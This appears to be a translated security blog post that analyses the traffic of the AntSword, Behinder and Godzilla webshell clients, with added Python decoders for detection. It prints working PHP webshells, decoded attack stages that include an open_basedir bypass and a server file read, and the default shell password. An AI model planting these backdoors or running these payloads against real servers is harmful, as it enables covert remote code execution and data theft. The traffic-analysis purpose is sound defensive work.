s1eep123's blog.

Traffic analysis of common webshell clients

Word count: 2.9k. Reading time: 15 min
2022/09/08

AntSword

One-line website backdoor

    <?php eval($_POST['bckdor']);?>

Wireshark capture

Connection process analysis
  1. HTTP request packet

    POST /ma.php HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1643
    Connection: close

    bckdor=%40eval(%40base64_decode(%24_POST%5B'e435b616de0459'%5D))%3B&e435b616de0459=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%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk%2FJHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

    URL-decoded

    bckdor=@eval(@base64_decode($_POST['e435b616de0459']));&e435b616de0459=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoIi87fDovIiwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjE1MzA5NTg5MWJkZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI1NTFhIi4iYzc1ODAiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImY1NSIuIjJiZSI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

    Base64 part decoded, code reformatted and annotated

    @ini_set("display_errors", "0");
    @set_time_limit(0);
    $opdir = @ini_get("open_basedir"); // directories the script is allowed to access
    if ($opdir) {
        $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]); // absolute path of this file on the server, reduced to its directory
        $oparr = preg_split("/;|:/", $opdir);
        @array_push($oparr, $ocwd, sys_get_temp_dir());
        foreach ($oparr as $item) { // walk the open_basedir entries, the script's own directory and the temp directory
            if (!@is_writable($item)) {
                continue;
            }
            $tmdir = $item . "/.153095891bdd";
            @mkdir($tmdir); // create the temporary directory .153095891bdd
            if (!@file_exists($tmdir)) {
                continue;
            }
            @chdir($tmdir); // change into .153095891bdd
            @ini_set("open_basedir", ".."); // open_basedir is now "..", the parent of the current directory
            $cntarr = @preg_split("/\\\\|\//", $tmdir);
            for ($i = 0; $i < sizeof($cntarr); $i++) { // climb one level per path component
                @chdir("..");
            }
            @ini_set("open_basedir", "/"); // open_basedir now covers the whole filesystem
            @rmdir($tmdir);
            break;
        }
    }

    function asenc($out) {
        return @base64_encode($out);
    }

    function asoutput() {
        $output = ob_get_contents();
        ob_end_clean();
        echo "551a" . "c7580";  // random prefix marker
        echo @asenc($output);   // base64 of the buffered output
        echo "f55" . "2be";     // random suffix marker
    }
    ob_start();
    try {
        $D = dirname($_SERVER["SCRIPT_FILENAME"]);
        if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
        $R = "{$D}\t"; // fields are separated by a literal tab in the payload
        if (substr($D, 0, 1) != "/") {
            foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
        } else {
            $R .= "/";
        }
        $R .= "\t";
        $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
        $s = ($u) ? $u["name"] : @get_current_user();
        $R .= php_uname();
        $R .= "\t{$s}";
        echo $R;
    } catch (Exception $e) {
        echo "ERROR://" . $e->getMessage();
    }
    asoutput();
    die();

    Response packet

    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 02:43:30 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    551ac7580RDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAJQzpEOkU6RjpHOglXaW5kb3dzIE5UIERFU0tUT1AtUkk1OTA2SyA2LjIgYnVpbGQgOTIwMCAoV2luZG93cyA4IEhvbWUgUHJlbWl1bSBFZGl0aW9uKSBBTUQ2NAlyb3lhbA==f552be
Command execution analysis
  1. POST packet

    POST /ma.php HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1413
    Connection: close

    b22dda04ada35c=rRRDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAvLmh0YWNjZXNz&bckdor=%40eval(%40base64_decode(%24_POST%5B'i999ba0d8875f2'%5D))%3B&i999ba0d8875f2=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%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D
  2. Decoded

    b22dda04ada35c=rRRDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAvLmh0YWNjZXNz
    &bckdor=@eval(@base64_decode($_POST['i999ba0d8875f2']));

    &i999ba0d8875f2=
    @ini_set("display_errors", "0");
    @set_time_limit(0);
    $opdir = @ini_get("open_basedir");
    if ($opdir) {
        $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
        $oparr = preg_split("/;|:/", $opdir);
        @array_push($oparr, $ocwd, sys_get_temp_dir());
        foreach ($oparr as $item) {
            if (!@is_writable($item)) {
                continue;
            }
            $tmdir = $item . "/.ee083";
            @mkdir($tmdir);
            if (!@file_exists($tmdir)) {
                continue;
            }
            @chdir($tmdir);
            @ini_set("open_basedir", "..");
            $cntarr = @preg_split("/\\\\|\//", $tmdir);
            for ($i = 0; $i < sizeof($cntarr); $i++) {
                @chdir("..");
            }
            @ini_set("open_basedir", "/");
            @rmdir($tmdir);
            break;
        }
    }

    function asenc($out) {
        return @base64_encode($out);
    }

    function asoutput() {
        $output = ob_get_contents();
        ob_end_clean();
        echo "b919" . "585d6";  // random prefix marker
        echo @asenc($output);
        echo "0cb" . "23b7";    // random suffix marker
    }
    ob_start();
    try {
        // the first two characters of b22dda04ada35c are random padding; the rest is the base64 of the
        // target path (here D:/phpStudy_64/phpstudy_pro/WWW/php/.htaccess), so this request reads a file
        $F = base64_decode(substr($_POST["b22dda04ada35c"], 2));
        $P = @fopen($F, "r");
        echo(@fread($P, filesize($F) ? filesize($F) : 4096));
        @fclose($P);
    } catch (Exception $e) {
        echo "ERROR://" . $e->getMessage();
    }
    asoutput();
    die();
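To make the manual decoding above repeatable during incident response, here is an added Python example (not from the original post and not AntSword's own code) that parses an AntSword request body, recovers the random prefix/suffix markers from the base64 stage, and uses them to strip and decode the response. The request body is constructed with a shortened stage that keeps the markers seen in the capture; the response body is the one captured above.

```python
import base64
import re
from urllib.parse import parse_qs, quote

# Stager form seen in the capture: @eval(@base64_decode($_POST['<hex>']));
STAGER_RE = re.compile(r"@eval\(@base64_decode\(\$_POST\['([0-9a-f]+)'\]\)\)")
# The stage prints its base64 output between two random hex markers:
#   echo "551a"."c7580"; echo @asenc($output); echo "f55"."2be";
MARKER_RE = re.compile(r'echo\s+"([0-9a-f]+)"\s*\.\s*"([0-9a-f]+)"\s*;')

def parse_antsword_request(body):
    """Return (password_param, stage_param, decoded_php), or None if the body is not AntSword-like."""
    fields = parse_qs(body)
    for name, values in fields.items():
        m = STAGER_RE.search(values[0])
        if m and m.group(1) in fields:
            php = base64.b64decode(fields[m.group(1)][0]).decode("utf-8", "replace")
            return name, m.group(1), php
    return None

def response_markers(php):
    """(prefix, suffix) the stage prints around its base64 output, or None if not found."""
    pairs = MARKER_RE.findall(php)
    if len(pairs) < 2:
        return None
    return (pairs[0][0] + pairs[0][1], pairs[1][0] + pairs[1][1])

def decode_antsword_response(body, prefix, suffix):
    """Strip the random markers and base64-decode the shell's real output."""
    body = body.strip()
    if not (body.startswith(prefix) and body.endswith(suffix)):
        return None
    inner = body[len(prefix):len(body) - len(suffix)]
    return base64.b64decode(inner).decode("utf-8", "replace")

def analyze(request_body, response_body):
    """Return the tab-separated output fields of one request/response pair, or None."""
    parsed = parse_antsword_request(request_body)
    if parsed is None:
        return None
    markers = response_markers(parsed[2])
    if markers is None:
        return None
    out = decode_antsword_response(response_body, *markers)
    return None if out is None else out.split("\t")

# Constructed request: the stager from the capture plus a shortened stage that keeps
# the same output markers as the decoded code above (not the full AntSword stage).
STAGE_PHP = ('@ini_set("display_errors", "0");function asoutput(){$o=ob_get_contents();'
             'ob_end_clean();echo "551a"."c7580";echo @base64_encode($o);echo "f55"."2be";}'
             'ob_start();echo php_uname();asoutput();die();')
SAMPLE_REQUEST = ("bckdor=%40eval(%40base64_decode(%24_POST%5B'e435b616de0459'%5D))%3B"
                  "&e435b616de0459=" + quote(base64.b64encode(STAGE_PHP.encode()).decode(), safe=""))
# Response body exactly as captured in the first AntSword exchange on this page.
SAMPLE_RESPONSE = "551ac7580RDovcGhwU3R1ZHlfNjQvcGhwc3R1ZHlfcHJvL1dXVy9waHAJQzpEOkU6RjpHOglXaW5kb3dzIE5UIERFU0tUT1AtUkk1OTA2SyA2LjIgYnVpbGQgOTIwMCAoV2luZG93cyA4IEhvbWUgUHJlbWl1bSBFZGl0aW9uKSBBTUQ2NAlyb3lhbA==f552be"

if __name__ == "__main__":
    print(analyze(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

The markers change per request, which is why they are read from the decoded stage rather than hard-coded; a response that does not carry the expected pair is reported as None.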

Behinder 2.0 traffic analysis

Backdoor

The analysis uses the PHP webshell that ships with Behinder.

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
}
?>
Wireshark capture

Connection process analysis

The shell checks whether the GET parameter pass is present. If it is, it generates a random 16-character key (from a time-based uniqid), stores it in the session and prints it. On a request without pass it reads the key back from the session and checks whether the openssl extension is loaded; if so, it decrypts the POST body with AES and obtains the intermediate string assert|eval("phpinfo();"). This string is emitted by the Behinder loader and is predefined. The server splits it with explode into an array, then calls element 0 as a variable function with element 1 as its argument, i.e. assert("eval("phpinfo;")"). If openssl is not loaded, the body is handled with base64 plus XOR instead. This also gave the shell some AV-evasion value early on, but assert has since been flagged as a dangerous function.

  1. First GET request

    GET /shell.php?pass=830 HTTP/1.1
    Content-type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=oat0ierrkmesft82r8f3cahld0; path=/
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    efc6eabf7e74c052

    The server generates the key and writes it to the session; the session is bound to the current connection.

  2. Second GET request

    GET /shell.php?pass=862 HTTP/1.1
    Content-type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=guos18kll9it96vi1d5pt2hfv3; path=/
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    2799e642b49292f5

    The second request fetches the key: 2799e642b49292f5 is the key used to decrypt the code that follows.

  3. Third POST request

    The POST data can be decrypted with the key above to recover the code; decryption site: http://tools.bugscaner.com/cryptoaes/

    POST /shell.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=guos18kll9it96vi1d5pt2hfv3; path=/
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
    Cache-Control: no-cache
    Pragma: no-cache
    Host: 192.168.124.15
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 1112

    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
    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:15:29 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    Bnd5kIU4J47rBRDDsjLphOLDXZvLCCz7jxHMJr5Et5nRT4dXOImO66RrGr2hl8wf4VtOZadbTvs/8BE1My4QAoG2emIcUrCIDh40VIS25l/oyrLapJB/2y59OPr4AAmb

    Request body after AES decryption

    assert|eval(base64_decode('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'));

    Request body after base64 decode

    @error_reporting(0);
    function main($content)
    {
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
    }

    function encrypt($data,$key)
    {
    if(!extension_loaded('openssl'))
    {
    for($i=0;$i<strlen($data);$i++) {
    $data[$i] = $data[$i]^$key[$i+1&15];
    }
    return $data;
    }
    else
    {
    return openssl_encrypt($data, "AES128", $key);
    }
    }
    $content = "6076b8c3-852b-4d8d-b841-1c3103a5f956";
    main($content);

    Response body after AES decryption

    {"status":"c3VjY2Vzcw==","msg":"NjA3NmI4YzMtODUyYi00ZDhkLWI4NDEtMWMzMTAzYTVmOTU2"}

    Many vendors now match on the returned content, so this dynamic-key encryption was dropped in Behinder 3.

  4. Fourth POST request

    Request body decrypted: phpinfo()

    error_reporting(0);
    function main() {
    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
    for($i=65;$i<=90;$i++)
    {
    $drive=chr($i).':/';
    file_exists($drive) ? $driveList=$driveList.$drive.";":'';
    }
    }
    else
    {
    $driveList="/";
    }
    $currentPath=getcwd();
    //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    echo encrypt(json_encode($result), $key);
    }

    function encrypt($data,$key)
    {
    if(!extension_loaded('openssl'))
    {
    for($i=0;$i<strlen($data);$i++) {
    $data[$i] = $data[$i]^$key[$i+1&15];
    }
    return $data;
    }
    else
    {
    return openssl_encrypt($data, "AES128", $key);
    }
    }
    main();

Behinder 3.0 traffic analysis

Backdoor code

Compared with version 2.0, the key is now derived from the MD5 of the password, and the response that generated a random 16-character key is gone.

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // first 16 characters of the 32-character MD5 of the connection password; default password rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
Wireshark capture and analysis

Traffic analysis

Compared with 2.0, the capture no longer contains a request to fetch a dynamic key: the AES key is md5("pass")[0:16], i.e. the first 16 characters of the 32-character MD5, and no key is exchanged at any point. There are only two requests in total. The first checks whether a connection can be established (the two GETs that fetched Behinder's dynamic key are gone); the second sends phpinfo and similar code for execution to collect information about the site.

  1. First POST request

    POST /shell.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-type: application/x-www-form-urlencoded
    Referer: http://127.0.0.1/A8.php
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0
    Cache-Control: no-cache
    Pragma: no-cache
    Host: 127.0.0.1
    Connection: keep-alive
    Content-Length: 1432

    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

    Decrypted

    assert|eval(base64_decode('

    @error_reporting(0);
    function main($content)
    {
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
    }

    function encrypt($data,$key)
    {
    if(!extension_loaded('openssl'))
    {
    for($i=0;$i<strlen($data);$i++) {
    $data[$i] = $data[$i]^$key[$i+1&15];
    }
    return $data;
    }
    else
    {
    return openssl_encrypt($data, "AES128", $key);
    }
    }$content="S3F0TTlUQjVsSkRGNnFlSHU2dEt0c0RzdzZlUWpWaUJobzRCMW9id0NlSzd2SzlEWFBaMENsSXpJVXh5aTFwMWxNa3VSd1k5YVJUQWZnNWkzS0JPQ3hsbWRpdGpHZkQ4dnlsMk9SenZ1T3hxZE5FOEVGaEs1TXF0S1hHcFZxSVIyeWJTY25weHZDWW93SnZ0";$content=base64_decode($content);
    main($content);

    // Decoding the data of this first request shows a variable $content whose name and contents are randomly generated. The purpose is to defeat detection on Content-Length: the fixed length of the Behinder 2.0 request had already been added to WAF detection rules, so Behinder 3.0 pads the request with random data.

    '));

    HTTP/1.1 200 OK
    Date: Thu, 08 Sep 2022 07:47:16 GMT
    Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
    X-Powered-By: PHP/5.6.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=j39c0oi2abaghm0b8h5ab7pmj3; path=/
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047YjfczwY6j42REBdjeI0ap/e4pavYx6svt2i0v0ZERdkwhGaPZ/VBGvP1Cw29Ic+DnwBtTxWec7IuOA8jFdHrujhbw+4sln0433D5aFZLZUmEL6LuWpl2caVaTnmhPj7pWvWPGafD8CsHA1kTk/zy6s6ik5IMIWJkDVTI3vlb4zy2y5Qomp0RDOjsYaeRkwQerekW7A0sZcCm4suP8/BO3J/W6pOaBUhYUKjVIB/zsvKBsBgz1pMpUMBLFSU8B1RApobdh5rzEsKseQXvj4HKy+3HwF72AKQ
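The following Python example (added here; not part of the original post and not Behinder's own code) covers the parts of the 2.0 and 3.0 decoding paths that need no AES library: it derives the 3.0 static key from a connection password, ports the XOR fallback loop of the shell, and recognises the bare 16-hex-character body that a 2.0 key response carries. The sample request body is constructed from the predefined first message assert|eval("phpinfo();") recovered above.

```python
import base64
import hashlib
import re

# Behinder 2.0 hands out a 16-hex-char session key as the bare body of the GET ?pass= response.
KEY_RESPONSE_RE = re.compile(r"^[0-9a-f]{16}$")

def behinder3_key(password):
    """Behinder 3.0 static key: first 16 hex characters of md5(connection password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16]

def xor_codec(data, key):
    """Port of the PHP fallback loop  $post[$i] ^ $key[$i+1&15]  (in PHP, + binds before &).
    XOR with a repeating key is its own inverse, so one function both encodes and decodes."""
    if len(key) != 16:
        raise ValueError("Behinder keys are 16 characters")
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))

def decode_xor_request(body_b64, key):
    """Reverse the non-openssl request path: base64_decode, XOR, then explode('|', ...)."""
    plain = xor_codec(base64.b64decode(body_b64), key).decode("utf-8", "replace")
    if "|" not in plain:
        return None
    func, params = plain.split("|", 1)
    return func, params

def is_behinder2_key_response(body):
    """True for a body that looks like the key handed out by the 2.0 shell (e.g. 2799e642b49292f5)."""
    return KEY_RESPONSE_RE.match(body.strip()) is not None

# Constructed sample: the predefined first message the page recovers from the capture,
# encoded the way the shell's fallback branch expects it (XOR with the key, then base64).
KEY = behinder3_key("rebeyond")  # default password of the Behinder 3.0 shell shown above
FIRST_MESSAGE = b'assert|eval("phpinfo();")'
SAMPLE_BODY = base64.b64encode(xor_codec(FIRST_MESSAGE, KEY)).decode()

if __name__ == "__main__":
    print(KEY, decode_xor_request(SAMPLE_BODY, KEY), is_behinder2_key_response("2799e642b49292f5"))
```

For captures taken from a host with the openssl extension, the same key feeds openssl_decrypt's AES-128 path, which needs an AES library and is not shown here.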

Godzilla

Backdoor program

Summary

AntSword:
  request:  base64 and similar encodings
  response: plaintext

Behinder 2.0:
  with the openssl extension:    request AES-encrypted with a dynamic key; response AES + base64
  without the openssl extension: request XOR; response XOR + base64

Behinder 3.0:
  with the openssl extension:    request AES-encrypted with a static key; response AES + base64
  without the openssl extension: request XOR; response XOR + base64

Godzilla:
  PHP: request base64 + XOR + base64; response XOR + base64 + junk characters
  JSP: request base64 + AES; response AES + base64 + junk characters
